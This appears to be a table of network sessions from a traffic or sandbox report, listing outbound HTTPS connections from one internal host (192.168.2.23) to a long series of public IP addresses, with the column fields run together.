                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15929192.168.2.2341510150.81.78.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15930192.168.2.234323873.164.144.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15931192.168.2.235170476.242.192.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15932192.168.2.234198682.226.139.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15933192.168.2.235250298.122.239.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15934192.168.2.234475688.197.69.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15935192.168.2.2354598180.13.183.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15936192.168.2.2352016179.224.255.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15937192.168.2.235786680.234.91.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15938192.168.2.2353902106.163.79.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15939192.168.2.2347602143.68.106.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15940192.168.2.234704418.4.71.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15941192.168.2.234441687.179.35.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15942192.168.2.234041865.239.36.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15943192.168.2.2355440174.161.249.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15944192.168.2.2351998197.251.88.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15945192.168.2.234185023.183.232.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15946192.168.2.233391025.69.147.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15947192.168.2.234142254.106.232.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15948192.168.2.2355938169.149.210.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15949192.168.2.233319899.96.63.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15950192.168.2.235263499.236.127.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15951192.168.2.233978412.151.61.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15952192.168.2.235673270.64.55.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15953192.168.2.2360386184.152.127.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15954192.168.2.234372636.30.5.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15955192.168.2.2335000209.33.89.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15956192.168.2.2360742161.165.42.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15957192.168.2.2337058165.45.164.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15958192.168.2.2346010162.23.212.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15959192.168.2.234845817.104.161.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15960192.168.2.2346054124.47.132.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15961192.168.2.235954875.103.248.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15962192.168.2.2339738150.251.136.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15963192.168.2.2333476139.150.138.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15964192.168.2.2335922170.76.212.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15965192.168.2.235220619.240.98.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15966192.168.2.234090871.117.160.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15967192.168.2.234183669.174.79.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15968192.168.2.234269486.254.53.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15969192.168.2.2339652185.248.182.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15970192.168.2.2356110107.191.118.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15971192.168.2.2353946173.79.100.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15972192.168.2.234336034.122.211.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15973192.168.2.2342650169.54.214.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15974192.168.2.2344470126.142.199.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15975192.168.2.2342882187.89.112.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15976192.168.2.2336540110.189.91.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15977192.168.2.235365878.28.183.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15978192.168.2.2340576113.94.136.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15979192.168.2.2352108218.185.106.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15980192.168.2.2340918111.151.236.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15981192.168.2.233626049.203.105.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15982192.168.2.234515070.196.53.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15983192.168.2.2337418220.92.71.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15984192.168.2.235039446.1.70.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15985192.168.2.235529675.24.239.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15986192.168.2.235334840.201.242.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15987192.168.2.235115670.224.199.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15988192.168.2.2334424103.10.104.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15989192.168.2.2358608156.62.58.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15990192.168.2.2344486110.62.105.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15991192.168.2.2360404114.65.115.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15992192.168.2.2340368193.20.38.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15993192.168.2.2360946164.20.132.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15994192.168.2.2349718107.151.223.1238080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15995192.168.2.2359844218.93.127.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15996192.168.2.234031274.228.158.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15997192.168.2.2348860135.239.13.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15998192.168.2.235646272.41.12.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15999192.168.2.234751240.4.15.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16000192.168.2.233371688.85.120.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16001192.168.2.2350700209.72.166.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16002192.168.2.2351918193.70.135.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16003192.168.2.234538086.15.209.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16004192.168.2.2345780124.237.143.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16005192.168.2.233552651.223.93.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16006192.168.2.235789020.83.211.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16007192.168.2.234890873.103.110.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16008192.168.2.2344440178.25.110.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16009192.168.2.2359022211.214.20.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16010192.168.2.2349044168.106.172.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16011192.168.2.233286435.84.149.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16012192.168.2.233385871.78.115.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16013192.168.2.2349142154.252.165.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16014192.168.2.235086676.237.175.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16015192.168.2.235741220.242.170.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16016192.168.2.2344760152.73.210.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16017192.168.2.233851078.16.175.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16018192.168.2.2338040177.205.96.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16019192.168.2.2333926135.91.42.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16020192.168.2.233348293.27.209.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16021192.168.2.2353448107.163.98.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16022192.168.2.2359512114.175.236.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16023192.168.2.2335222108.125.116.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16024192.168.2.236085618.192.237.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16025192.168.2.2332854135.103.176.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16026192.168.2.2335454109.137.136.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16027192.168.2.2353012111.242.17.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16028192.168.2.235642288.199.144.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16029192.168.2.23541061.243.55.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16030192.168.2.235635492.197.103.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16031192.168.2.233298880.252.114.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16032192.168.2.2337124156.191.108.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16033192.168.2.2352976190.123.246.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16034192.168.2.2346010116.163.176.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16035192.168.2.235067458.39.149.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16036192.168.2.2339692159.68.20.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16037192.168.2.2339252187.249.0.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16038192.168.2.2358024190.14.224.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16039192.168.2.2340854207.110.8.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16040192.168.2.2356668188.178.27.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16041192.168.2.2333474157.240.49.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16042192.168.2.2351646202.44.127.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16043192.168.2.2338418149.65.234.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16044192.168.2.2354270213.57.112.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16045192.168.2.2345370207.189.227.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16046192.168.2.234846654.14.96.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16047192.168.2.2340168154.82.162.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16048192.168.2.2335364123.91.238.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16049192.168.2.235776046.116.92.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16050192.168.2.235685441.194.129.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16051192.168.2.235890295.126.183.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16052192.168.2.2345782211.33.5.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16053192.168.2.2356658101.108.149.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16054192.168.2.2334872190.191.231.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16055192.168.2.2344668147.140.110.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16056192.168.2.2333492134.252.131.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16057192.168.2.2337124167.62.125.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16058192.168.2.2356574185.38.155.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16059192.168.2.2356414144.75.234.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16060192.168.2.2342248109.107.244.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16061192.168.2.235448236.61.130.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16062192.168.2.2358442199.77.58.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16063192.168.2.2354720209.233.227.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16064192.168.2.2343328109.86.190.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16065192.168.2.2338252199.136.190.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16066192.168.2.2355250149.145.75.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16067192.168.2.2350628162.249.241.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16068192.168.2.235120253.178.5.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16069192.168.2.2335284103.138.113.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16070192.168.2.2357658193.87.189.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16071192.168.2.2337834136.69.152.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16072192.168.2.235945665.74.239.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16073192.168.2.2360598148.222.132.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16074192.168.2.233974880.37.33.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16075192.168.2.2339788212.209.145.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16076192.168.2.2333960186.155.2.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16077192.168.2.2333178218.238.60.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16078192.168.2.2359740172.42.210.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16079192.168.2.233756038.96.237.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16080192.168.2.2346468217.199.135.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16081192.168.2.2340282105.151.164.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16082192.168.2.2339848184.72.157.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16083192.168.2.235291876.69.138.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16084192.168.2.235949054.83.212.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16085192.168.2.2341492166.99.18.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16086192.168.2.234989298.56.6.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16087192.168.2.2340138191.90.119.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16088192.168.2.233558023.11.232.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16089192.168.2.234375014.158.31.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16090192.168.2.2355426182.100.81.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16091192.168.2.2344590166.207.131.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16092192.168.2.2346154183.102.2.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16093192.168.2.233485231.43.121.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16094192.168.2.2358812194.76.179.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16095192.168.2.2359060107.45.27.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16096192.168.2.233421284.162.218.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16097192.168.2.235840645.68.75.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16098192.168.2.234717612.49.249.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16099192.168.2.236078868.2.116.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16100192.168.2.2360922131.78.233.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16101192.168.2.2347472179.249.142.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16102192.168.2.2344088126.145.67.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16103192.168.2.2345138216.224.88.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16104192.168.2.2351980188.6.185.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16105192.168.2.233559627.66.218.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16106192.168.2.235701817.55.8.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16107192.168.2.234088685.98.2.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16108192.168.2.235352247.16.94.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16109192.168.2.23465422.60.26.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16110192.168.2.2342540217.118.43.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16111192.168.2.2348856114.126.182.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16112192.168.2.2356012192.255.204.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16113192.168.2.2345006153.12.92.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16114192.168.2.2353124180.18.210.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16115192.168.2.233364898.106.81.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16116192.168.2.235439224.8.220.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16117192.168.2.233660483.124.46.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16118192.168.2.2336124201.88.68.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16119192.168.2.2352514169.191.0.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16120192.168.2.2332830110.206.206.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16121192.168.2.234791260.161.116.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16122192.168.2.2354214198.53.27.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16123192.168.2.233328447.33.216.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16124192.168.2.2357736111.237.157.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16125192.168.2.233296025.130.255.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16126192.168.2.234224663.179.108.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16127192.168.2.2346556155.26.181.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16128192.168.2.2342218157.223.9.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16129192.168.2.2345918222.90.147.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16130192.168.2.2351444209.130.115.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16131192.168.2.233689851.237.31.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16132192.168.2.235241861.100.147.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16133192.168.2.2343338142.224.110.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16134192.168.2.2338160101.139.81.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16135192.168.2.233427899.23.129.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16136192.168.2.233662057.167.245.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16137192.168.2.2338528212.132.165.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16138192.168.2.234887076.241.242.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16139192.168.2.2339438158.23.72.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16140192.168.2.2356362135.47.242.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16141192.168.2.23454089.32.111.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16142192.168.2.233994499.22.94.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16143192.168.2.235959882.165.178.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16144192.168.2.2359044144.147.64.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16145192.168.2.233573493.118.193.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16146192.168.2.235544020.114.231.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16147192.168.2.234879088.252.43.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16148192.168.2.2359770176.212.127.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16149192.168.2.23360744.13.121.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
